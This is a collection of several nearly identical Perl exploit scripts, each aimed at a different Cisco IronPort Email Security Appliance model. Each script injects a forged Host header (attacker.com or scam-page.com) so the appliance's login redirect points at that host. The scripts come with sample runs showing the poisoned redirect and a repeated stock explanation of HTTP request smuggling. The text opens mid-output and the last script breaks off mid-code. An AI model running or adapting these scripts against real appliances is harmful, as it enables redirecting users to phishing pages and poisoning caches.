#  # <  Referrer-Policy => strict-origin-when-cross-origin
#  # <  Refresh => 0; URL=https://attacker.com/login?CSRFKey=6c74441b-fe79-9d05-3273-bf06907363d6&referrer=https%3A%2F%2Fattacker.com%2FSearch
#  # <  Set-Cookie => sid=N4o3gPxyqKQPcHCkmVP7; httponly; Path=/; secure
#  # <  Strict-Transport-Security => max-age=157680000
#  # <  Title => : Redirecting
#  # <  X-Content-Type-Options => nosniff
#  # <  X-Frame-Options => SAMEORIGINSAMEORIGIN   <<-- WTF?? o.O
#  # <  X-XSS-Protection => 1; mode=block
#  # ====================================================================================
#  # IronPort is Poisoned => https://attacker.com/login?CSRFKey=6c74441b-fe79-9d05-3273-bf06907363d6&referrer=https%3A%2F%2Fattacker.com%2FSearch
#       [test@localhost ironport]$ 
#   
#  Request Smuggling Attack - Input and Data Validation
#    
#  Implementation
#    
#    o   Attack Applies To Vulnerable web servers and proxies.
#  
#  
#  Description
#  
#  HTTP request smuggling is a technique to take advantage 
#  of discrepancies in parsing when one or more HTTP devices
#  are between the user and the web server. An attacker may 
#  be able to 'smuggle' malicious requests through a packet 
#  inspector, firewall or web proxy server. This technique 
#  may leave the web server vulnerable to various attacks 
#  such as web cache poisoning, or allow the attacker to 
#  request protected files on the web server.
#  
#  Impact
#  
#        Cache poisoning: An attacker may be able to ‘rewire’ 
#    o   a web server cache so that one page is served when 
#        another is requested.
#
#        Malicious requests: An attacker may be able to smuggle 
#    o   a malicious request through a packet inspector, web proxy
#        server, or firewall because of discrepancies in security 
#        rules between it and the web server.
#
#        Credential hijacking: An attacker may be able to insert 
#    o   a request into the HTTP flow, thereby manipulating the 
#        web server’s request/response sequencing, which can allow 
#        the attacker to hijack a third party’s credentials.
#  
#  Vulnerabilities
#  
#     o  Web server, packet inspector, firewall, or web proxy server 
#        misconfiguration.
#  
#  Countermeasures
#  
#        Deploy a non-vulnerable web server: Web servers with a very 
#     o  strict HTTP parsing procedure may not be vulnerable to this 
#        attack.
#
#        Change all pages to non-cacheable: This will force the proxy 
#        to retrieve the pages from the web server every time. Although 
#     o  this is better from a security perspective, the reality is that 
#        caching significantly improves the server's performance and 
#        reduces latency. Thus, other countermeasures are a better long 
#        term fix.
#
#     o  Rewrite all HTTP requests: Install a module on a firewall or 
#        proxy server to rewrite each HTTP request on the fly to a known 
#        valid request type.
#
#     o  Update your web server: Contact the web server vendor and check 
#        if there has been a patch released for a this type of vulnerability.
#  
#  
#  Example
#  
#  This example describes the classic request smuggling attack
#  in which an attacker can poison one page with the contents 
#  of another. In this example, the attacker combines one POST 
#  request and two GET requests into a single malformed HTTP 
#  request. The HTTP request has two Content-Length headers 
#  with conflicting values. Some servers, such as IIS and 
#  Apache simply reject such a request, but others attempt to 
#  ‘fix’ the error. Fortunately for the attacker, certain web 
#  servers and web proxies choose to pay attention to different
#  sections of the malformed request.
#  
#  In this case let "somewhere.com" be the DNS name of the web 
#  server behind the proxy, and suppose that "/poison.html" is
#  a static and cacheable HTML page on the web server.
#  
#  1 POST http://somewhere.com/example.html 
#  HTTP/1.1\r\n2 Host: somewhere.com\r\n3 
#  Connection: Keep-Alive\r\n4 
#  Content-Type: application/x-www-form-urlencoded\r\n5 
#  Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9 
#  Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12 
#  Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#  
#  Note that line 10 is the only line that does not end in 
#  CRLF ("\r\n") and instead there is a space ("Bla: "). 
#  This request is sent to a web server via a proxy server.
#  
#  First, this message is parsed by the proxy. When the proxy server 
#  parses the message, it finds the POST request (lines 1-7) followed by 
#  the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
#  the first header and believes the body is 53 bytes long (which is exactly 
#  the number of bytes used by lines 8-10 including CRLFs). The proxy then 
#  sees lines 11-14 and interprets them as a second request.
#  
#  Second, the message is parsed by the web server. Although the web server
#  receives the same message, when it sees the first Content-Length in line 5,
#  it thinks that the body of the POST request is 0 bytes in length. 
#  Therefore it finds the second request in line 8 and interprets line 11 
#  as the value of "Bla: " in line 10 because of the missing CRLF.
#  
#  
#  At this point the web server responds to the GET in line 8 by sending 
#  the content of /poison.html to the proxy. The proxy, expecting a 
#  response to the GET request in line 11, mistakenly matches the reply 
#  from the webserver with contents from /poison.html to the page /index.html. 
#  Therefore, the contents of /poison.html are cached under the name /index.html 
#  on the proxy. Now any user who requests http://somewhere.com/index.html 
#  through the proxy will receive the contents of http://somewhere.com/poison.html 
#  instead.
#  
#  There are several options available to mitigate this attack but all of 
#  them have their downside. If possible, use a well tested web server such 
#  as Apache or IIS. Otherwise, you can turn off server-side page caching, 
#  but this can lead to significant performance problems such as increased 
#  server load and latency. A final option is to use SSL communication for 
#  everything (HTTPS instead of HTTP), but this too has an associated 
#  performance overhead. 
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'attacker.com';


print "# Cisco Email Security Virtual Appliance C100V IronPort Remote Header 'Host' Injection
# ====================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ attacker.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# ====================================================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
  printf ("# IronPort is Poisoned => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("# Exploit failed!\n");
  exit;

}

#!/usr/bin/perl -w
#
#
#  Cisco C690 Email Security Appliance Version: 11.0.2-044 IronPort Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#
#       [test@localhost ironport]$ perl ironport_c690.pl https://192.168.1.1 attacker.com
#  # Cisco C690 Email Security Appliance Version: 11.0.2-044 IronPort Remote Header 'Host' Injection
#  # ===============================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => attacker.com
#  # >  User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.0 (like Gecko)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
#  # <  Date => Mon, 02 Sep 2019 13:59:40 GMT
#  # <  Location => https://attacker.com/login?CSRFKey=b0419e8a-b0f8-54c4-3ce8-35c3ff85f198&referrer=https%3A%2F%2Fattacker.com%2Fdefault
#  # <  Server => glass/1.0 Python/2.6.4
#  # <  Content-Type => text/html
#  # <  Expires => Mon, 02 Sep 2019 13:59:40 GMT
#  # <  Last-Modified => Mon, 02 Sep 2019 13:59:40 GMT
#  # <  Client-Date => Mon, 02 Sep 2019 13:59:40 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer => 
#  # <  Client-SSL-Cert-Subject => 
#  # <  Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Refresh => 0; URL=https://attacker.com/login?CSRFKey=b0419e8a-b0f8-54c4-3ce8-35c3ff85f198&referrer=https%3A%2F%2Fattacker.com%2Fdefault
#  # <  Set-Cookie => sid=sX3dmmKu8d9WPB87rY0E; httponly; Path=/; secure
#  # <  Title => : Redirecting
#  # <  X-Frame-Options => SAMEORIGIN
#  # ===============================================================================================
#  # IronPort is Poisoned => https://attacker.com/login?CSRFKey=b0419e8a-b0f8-54c4-3ce8-35c3ff85f198&referrer=https%3A%2F%2Fattacker.com%2Fdefault
#       [test@localhost ironport]$ 
#
#  Request Smuggling Attack - Input and Data Validation
#    
#  Implementation
#    
#    o   Attack Applies To Vulnerable web servers and proxies.
#  
#  
#  Description
#  
#  HTTP request smuggling is a technique to take advantage 
#  of discrepancies in parsing when one or more HTTP devices
#  are between the user and the web server. An attacker may 
#  be able to 'smuggle' malicious requests through a packet 
#  inspector, firewall or web proxy server. This technique 
#  may leave the web server vulnerable to various attacks 
#  such as web cache poisoning, or allow the attacker to 
#  request protected files on the web server.
#  
#  Impact
#  
#        Cache poisoning: An attacker may be able to ‘rewire’ 
#    o   a web server cache so that one page is served when 
#        another is requested.
#
#        Malicious requests: An attacker may be able to smuggle 
#    o   a malicious request through a packet inspector, web proxy
#        server, or firewall because of discrepancies in security 
#        rules between it and the web server.
#
#        Credential hijacking: An attacker may be able to insert 
#    o   a request into the HTTP flow, thereby manipulating the 
#        web server’s request/response sequencing, which can allow 
#        the attacker to hijack a third party’s credentials.
#  
#  Vulnerabilities
#  
#     o  Web server, packet inspector, firewall, or web proxy server 
#        misconfiguration.
#  
#  Countermeasures
#  
#        Deploy a non-vulnerable web server: Web servers with a very 
#     o  strict HTTP parsing procedure may not be vulnerable to this 
#        attack.
#
#        Change all pages to non-cacheable: This will force the proxy 
#        to retrieve the pages from the web server every time. Although 
#     o  this is better from a security perspective, the reality is that 
#        caching significantly improves the server's performance and 
#        reduces latency. Thus, other countermeasures are a better long 
#        term fix.
#
#     o  Rewrite all HTTP requests: Install a module on a firewall or 
#        proxy server to rewrite each HTTP request on the fly to a known 
#        valid request type.
#
#     o  Update your web server: Contact the web server vendor and check 
#        if there has been a patch released for a this type of vulnerability.
#  
#  
#  Example
#  
#  This example describes the classic request smuggling attack
#  in which an attacker can poison one page with the contents 
#  of another. In this example, the attacker combines one POST 
#  request and two GET requests into a single malformed HTTP 
#  request. The HTTP request has two Content-Length headers 
#  with conflicting values. Some servers, such as IIS and 
#  Apache simply reject such a request, but others attempt to 
#  ‘fix’ the error. Fortunately for the attacker, certain web 
#  servers and web proxies choose to pay attention to different
#  sections of the malformed request.
#  
#  In this case let "somewhere.com" be the DNS name of the web 
#  server behind the proxy, and suppose that "/poison.html" is
#  a static and cacheable HTML page on the web server.
#  
#  1 POST http://somewhere.com/example.html 
#  HTTP/1.1\r\n2 Host: somewhere.com\r\n3 
#  Connection: Keep-Alive\r\n4 
#  Content-Type: application/x-www-form-urlencoded\r\n5 
#  Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9 
#  Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12 
#  Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#  
#  Note that line 10 is the only line that does not end in 
#  CRLF ("\r\n") and instead there is a space ("Bla: "). 
#  This request is sent to a web server via a proxy server.
#  
#  First, this message is parsed by the proxy. When the proxy server 
#  parses the message, it finds the POST request (lines 1-7) followed by 
#  the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
#  the first header and believes the body is 53 bytes long (which is exactly 
#  the number of bytes used by lines 8-10 including CRLFs). The proxy then 
#  sees lines 11-14 and interprets them as a second request.
#  
#  Second, the message is parsed by the web server. Although the web server
#  receives the same message, when it sees the first Content-Length in line 5,
#  it thinks that the body of the POST request is 0 bytes in length. 
#  Therefore it finds the second request in line 8 and interprets line 11 
#  as the value of "Bla: " in line 10 because of the missing CRLF.
#  
#  
#  At this point the web server responds to the GET in line 8 by sending 
#  the content of /poison.html to the proxy. The proxy, expecting a 
#  response to the GET request in line 11, mistakenly matches the reply 
#  from the webserver with contents from /poison.html to the page /index.html. 
#  Therefore, the contents of /poison.html are cached under the name /index.html 
#  on the proxy. Now any user who requests http://somewhere.com/index.html 
#  through the proxy will receive the contents of http://somewhere.com/poison.html 
#  instead.
#  
#  There are several options available to mitigate this attack but all of 
#  them have their downside. If possible, use a well tested web server such 
#  as Apache or IIS. Otherwise, you can turn off server-side page caching, 
#  but this can lead to significant performance problems such as increased 
#  server load and latency. A final option is to use SSL communication for 
#  everything (HTTPS instead of HTTP), but this too has an associated 
#  performance overhead. 
# 
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'attacker.com';


print "# Cisco C690 Email Security Appliance Version: 11.0.2-044 IronPort Remote Header 'Host' Injection
# ===============================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ attacker.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# ===============================================================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
  printf ("# IronPort is Poisoned => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("# Exploit failed!\n");
  exit;

}

#!/usr/bin/perl -w
#
#
#  Cisco Email Security Virtual Appliance C600V IronPort Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#       [test@localhost ironport]$ perl ironport_c600v.pl https://192.168.1.1
#  # Cisco Email Security Virtual Appliance C600V IronPort Remote Header 'Host' Injection
#  # ====================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => scam-page.com
#  # >  User-Agent => ELinks (0.4.3; NetBSD 3.0.2_PATCH sparc64; 141x19)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
#  # <  Date => Tue, 03 Sep 2019 13:58:29 GMT
#  # <  Location => https://scam-page.com/login?CSRFKey=22d565b3-6429-411d-2a3d-a9bba5dcac50&referrer=https%3A%2F%2Fattacker.com%2FSearch
#  # <  Server => glass/1.0 Python/2.6.4
#  # <  Content-Type => text/html
#  # <  Expires => Tue, 03 Sep 2019 13:58:29 GMT
#  # <  Last-Modified => Tue, 03 Sep 2019 13:58:29 GMT
#  # <  Client-Date => Tue, 03 Sep 2019 13:58:28 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer => 
#  # <  Client-SSL-Cert-Subject => 
#  # <  Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Refresh => 0; URL=https://scam-page.com/login?CSRFKey=22d565b3-6429-411d-2a3d-a9bba5dcac50&referrer=https%3A%2F%2Fscam-page.com%2FSearch
#  # <  Set-Cookie => sid=buVlvCrOy92lf9YwCXi0; httponly; Path=/; secure
#  # <  Title => : Redirecting
#  # <  X-Frame-Options => SAMEORIGIN
#  # ====================================================================================
#  # IronPort is Poisoned => https://scam-page.com/login?CSRFKey=22d565b3-6429-411d-2a3d-a9bba5dcac50&referrer=https%3A%2F%2Fattacker.com%2FSearch
#       [test@localhost ironport]$ 
#
#   
#  Request Smuggling Attack - Input and Data Validation
#    
#  Implementation
#    
#    o   Attack Applies To Vulnerable web servers and proxies.
#  
#  
#  Description
#  
#  HTTP request smuggling is a technique to take advantage 
#  of discrepancies in parsing when one or more HTTP devices
#  are between the user and the web server. An attacker may 
#  be able to 'smuggle' malicious requests through a packet 
#  inspector, firewall or web proxy server. This technique 
#  may leave the web server vulnerable to various attacks 
#  such as web cache poisoning, or allow the attacker to 
#  request protected files on the web server.
#  
#  Impact
#  
#        Cache poisoning: An attacker may be able to ‘rewire’ 
#    o   a web server cache so that one page is served when 
#        another is requested.
#
#        Malicious requests: An attacker may be able to smuggle 
#    o   a malicious request through a packet inspector, web proxy
#        server, or firewall because of discrepancies in security 
#        rules between it and the web server.
#
#        Credential hijacking: An attacker may be able to insert 
#    o   a request into the HTTP flow, thereby manipulating the 
#        web server’s request/response sequencing, which can allow 
#        the attacker to hijack a third party’s credentials.
#  
#  Vulnerabilities
#  
#     o  Web server, packet inspector, firewall, or web proxy server 
#        misconfiguration.
#  
#  Countermeasures
#  
#        Deploy a non-vulnerable web server: Web servers with a very 
#     o  strict HTTP parsing procedure may not be vulnerable to this 
#        attack.
#
#        Change all pages to non-cacheable: This will force the proxy 
#        to retrieve the pages from the web server every time. Although 
#     o  this is better from a security perspective, the reality is that 
#        caching significantly improves the server's performance and 
#        reduces latency. Thus, other countermeasures are a better long 
#        term fix.
#
#     o  Rewrite all HTTP requests: Install a module on a firewall or 
#        proxy server to rewrite each HTTP request on the fly to a known 
#        valid request type.
#
#     o  Update your web server: Contact the web server vendor and check 
#        if there has been a patch released for a this type of vulnerability.
#  
#  
#  Example
#  
#  This example describes the classic request smuggling attack
#  in which an attacker can poison one page with the contents 
#  of another. In this example, the attacker combines one POST 
#  request and two GET requests into a single malformed HTTP 
#  request. The HTTP request has two Content-Length headers 
#  with conflicting values. Some servers, such as IIS and 
#  Apache simply reject such a request, but others attempt to 
#  ‘fix’ the error. Fortunately for the attacker, certain web 
#  servers and web proxies choose to pay attention to different
#  sections of the malformed request.
#  
#  In this case let "somewhere.com" be the DNS name of the web 
#  server behind the proxy, and suppose that "/poison.html" is
#  a static and cacheable HTML page on the web server.
#  
#  1 POST http://somewhere.com/example.html 
#  HTTP/1.1\r\n2 Host: somewhere.com\r\n3 
#  Connection: Keep-Alive\r\n4 
#  Content-Type: application/x-www-form-urlencoded\r\n5 
#  Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9 
#  Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12 
#  Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#  
#  Note that line 10 is the only line that does not end in 
#  CRLF ("\r\n") and instead there is a space ("Bla: "). 
#  This request is sent to a web server via a proxy server.
#  
#  First, this message is parsed by the proxy. When the proxy server 
#  parses the message, it finds the POST request (lines 1-7) followed by 
#  the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
#  the first header and believes the body is 53 bytes long (which is exactly 
#  the number of bytes used by lines 8-10 including CRLFs). The proxy then 
#  sees lines 11-14 and interprets them as a second request.
#  
#  Second, the message is parsed by the web server. Although the web server
#  receives the same message, when it sees the first Content-Length in line 5,
#  it thinks that the body of the POST request is 0 bytes in length. 
#  Therefore it finds the second request in line 8 and interprets line 11 
#  as the value of "Bla: " in line 10 because of the missing CRLF.
#  
#  
#  At this point the web server responds to the GET in line 8 by sending 
#  the content of /poison.html to the proxy. The proxy, expecting a 
#  response to the GET request in line 11, mistakenly matches the reply 
#  from the webserver with contents from /poison.html to the page /index.html. 
#  Therefore, the contents of /poison.html are cached under the name /index.html 
#  on the proxy. Now any user who requests http://somewhere.com/index.html 
#  through the proxy will receive the contents of http://somewhere.com/poison.html 
#  instead.
#  
#  There are several options available to mitigate this attack but all of 
#  them have their downside. If possible, use a well tested web server such 
#  as Apache or IIS. Otherwise, you can turn off server-side page caching, 
#  but this can lead to significant performance problems such as increased 
#  server load and latency. A final option is to use SSL communication for 
#  everything (HTTPS instead of HTTP), but this too has an associated 
#  performance overhead. 
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'scam-page.com';


print "# Cisco Email Security Virtual Appliance C600V IronPort Remote Header 'Host' Injection
# ====================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ scam-page.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# ====================================================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
  printf ("# IronPort is Poisoned => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("# Exploit failed!\n");
  exit;

}

#!/usr/bin/perl -w
#
#
#  Cisco Email Security Virtual Appliance C370 IronPort Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#
#       # Cisco Email Security Virtual Appliance C370 IronPort Remote Header 'Host' Injection
#  # ====================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => scam-page.com
#  # >  User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
#  # <  Date => Tue, 03 Sep 2019 14:08:31 GMT
#  # <  Location => https://scam-page.com/login?CSRFKey=ad152af5-aaa8-9f3c-c07b-02597f774f11&referrer=https%3A%2F%2Fscam-page.com%2FSearch
#  # <  Server => glass/1.0 Python/2.6.4
#  # <  Content-Type => text/html
#  # <  Expires => Tue, 03 Sep 2019 14:08:31 GMT
#  # <  Last-Modified => Tue, 03 Sep 2019 14:08:31 GMT
#  # <  Client-Date => Tue, 03 Sep 2019 14:08:31 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer => 
#  # <  Client-SSL-Cert-Subject => 
#  # <  Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Refresh => 0; URL=https://scam-page.com/login?CSRFKey=ad152af5-aaa8-9f3c-c07b-02597f774f11&referrer=https%3A%2F%2Fscam-page.com%2FSearch
#  # <  Set-Cookie => sid=1jT6SBcuy0WbyjUeh5YF; httponly; Path=/; secure
#  # <  Title => : Redirecting
#  # <  X-Frame-Options => SAMEORIGIN
#  # ====================================================================================
#  # IronPort is Poisoned => https://scam-page.com/login?CSRFKey=ad152af5-aaa8-9f3c-c07b-02597f774f11&referrer=https%3A%2F%2Fscam-page.com%2FSearch
#   
#  Request Smuggling Attack - Input and Data Validation
#    
#  Implementation
#    
#    o   Attack Applies To Vulnerable web servers and proxies.
#  
#  
#  Description
#  
#  HTTP request smuggling is a technique to take advantage 
#  of discrepancies in parsing when one or more HTTP devices
#  are between the user and the web server. An attacker may 
#  be able to 'smuggle' malicious requests through a packet 
#  inspector, firewall or web proxy server. This technique 
#  may leave the web server vulnerable to various attacks 
#  such as web cache poisoning, or allow the attacker to 
#  request protected files on the web server.
#  
#  Impact
#  
#        Cache poisoning: An attacker may be able to ‘rewire’ 
#    o   a web server cache so that one page is served when 
#        another is requested.
#
#        Malicious requests: An attacker may be able to smuggle 
#    o   a malicious request through a packet inspector, web proxy
#        server, or firewall because of discrepancies in security 
#        rules between it and the web server.
#
#        Credential hijacking: An attacker may be able to insert 
#    o   a request into the HTTP flow, thereby manipulating the 
#        web server’s request/response sequencing, which can allow 
#        the attacker to hijack a third party’s credentials.
#  
#  Vulnerabilities
#  
#     o  Web server, packet inspector, firewall, or web proxy server 
#        misconfiguration.
#  
#  Countermeasures
#  
#        Deploy a non-vulnerable web server: Web servers with a very 
#     o  strict HTTP parsing procedure may not be vulnerable to this 
#        attack.
#
#        Change all pages to non-cacheable: This will force the proxy 
#        to retrieve the pages from the web server every time. Although 
#     o  this is better from a security perspective, the reality is that 
#        caching significantly improves the server's performance and 
#        reduces latency. Thus, other countermeasures are a better long 
#        term fix.
#
#     o  Rewrite all HTTP requests: Install a module on a firewall or 
#        proxy server to rewrite each HTTP request on the fly to a known 
#        valid request type.
#
#     o  Update your web server: Contact the web server vendor and check 
#        if there has been a patch released for a this type of vulnerability.
#  
#  
#  Example
#  
#  This example describes the classic request smuggling attack
#  in which an attacker can poison one page with the contents 
#  of another. In this example, the attacker combines one POST 
#  request and two GET requests into a single malformed HTTP 
#  request. The HTTP request has two Content-Length headers 
#  with conflicting values. Some servers, such as IIS and 
#  Apache simply reject such a request, but others attempt to 
#  ‘fix’ the error. Fortunately for the attacker, certain web 
#  servers and web proxies choose to pay attention to different
#  sections of the malformed request.
#  
#  In this case let "somewhere.com" be the DNS name of the web 
#  server behind the proxy, and suppose that "/poison.html" is
#  a static and cacheable HTML page on the web server.
#  
#  1 POST http://somewhere.com/example.html 
#  HTTP/1.1\r\n2 Host: somewhere.com\r\n3 
#  Connection: Keep-Alive\r\n4 
#  Content-Type: application/x-www-form-urlencoded\r\n5 
#  Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9 
#  Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12 
#  Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#  
#  Note that line 10 is the only line that does not end in 
#  CRLF ("\r\n") and instead there is a space ("Bla: "). 
#  This request is sent to a web server via a proxy server.
#  
#  First, this message is parsed by the proxy. When the proxy server 
#  parses the message, it finds the POST request (lines 1-7) followed by 
#  the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
#  the first header and believes the body is 53 bytes long (which is exactly 
#  the number of bytes used by lines 8-10 including CRLFs). The proxy then 
#  sees lines 11-14 and interprets them as a second request.
#  
#  Second, the message is parsed by the web server. Although the web server
#  receives the same message, when it sees the first Content-Length in line 5,
#  it thinks that the body of the POST request is 0 bytes in length. 
#  Therefore it finds the second request in line 8 and interprets line 11 
#  as the value of "Bla: " in line 10 because of the missing CRLF.
#  
#  
#  At this point the web server responds to the GET in line 8 by sending 
#  the content of /poison.html to the proxy. The proxy, expecting a 
#  response to the GET request in line 11, mistakenly matches the reply 
#  from the webserver with contents from /poison.html to the page /index.html. 
#  Therefore, the contents of /poison.html are cached under the name /index.html 
#  on the proxy. Now any user who requests http://somewhere.com/index.html 
#  through the proxy will receive the contents of http://somewhere.com/poison.html 
#  instead.
#  
#  There are several options available to mitigate this attack but all of 
#  them have their downside. If possible, use a well tested web server such 
#  as Apache or IIS. Otherwise, you can turn off server-side page caching, 
#  but this can lead to significant performance problems such as increased 
#  server load and latency. A final option is to use SSL communication for 
#  everything (HTTPS instead of HTTP), but this too has an associated 
#  performance overhead. 
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'scam-page.com';


print "# Cisco Email Security Virtual Appliance C370 IronPort Remote Header 'Host' Injection
# ====================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ scam-page.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
